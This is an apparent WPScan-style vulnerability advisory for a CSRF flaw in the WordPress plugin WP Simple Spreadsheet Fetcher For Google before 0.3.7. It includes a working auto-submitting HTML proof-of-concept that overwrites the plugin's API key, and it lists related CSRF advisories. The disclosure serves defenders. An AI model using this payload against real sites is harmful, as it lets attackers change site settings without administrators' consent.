WP Simple Spreadsheet Fetcher For Google < 0.3.7 – Arbitrary API Key update via CSRF

Description

The lack of Cross-Site Request Forgery (CSRF) checks on the plugin's settings page could allow CSRF attacks to set an arbitrary API key.

Proof of Concept

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://[WP]/wp-admin/admin.php?page=wsgsf_settings" method="POST">
      <input type="hidden" name="api_key" value="YOLO" />
    </form>
  </body>
</html>

Affects Plugins

wp-simple-spreadsheet-fetcher-for-google

Fixed in 0.3.7

References

URL

https://plugins.trac.wordpress.org/changeset/2222358

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Verified

Yes

WPVDB ID

f224ff37-4126-49bc-b432-0d1e177abec8

Timeline

Publicly Published

2020-01-06 (about 6 years ago)

Added

2020-01-06 (about 6 years ago)

Last Updated

2020-01-06 (about 6 years ago)

Other

Published

Title

Published

2025-09-05

Title

Enable Latex <= 1.2.16 - Cross-Site Request Forgery

Published

2025-07-30

Title

Chartify < 3.5.4 - Cross-Site Request Forgery

Published

2025-06-05

Title

Print Invoice & Delivery Notes for WooCommerce < 5.6.0 - Cross-Site Request Forgery

Published

2019-02-26

Title

FormCraft <= 1.2.1 - Cross-Site Request Forgery (CSRF)

Published

2025-02-03

Title

DSGVO All in one for WP < 4.7 - Cross-Site Request Forgery to Account Deletion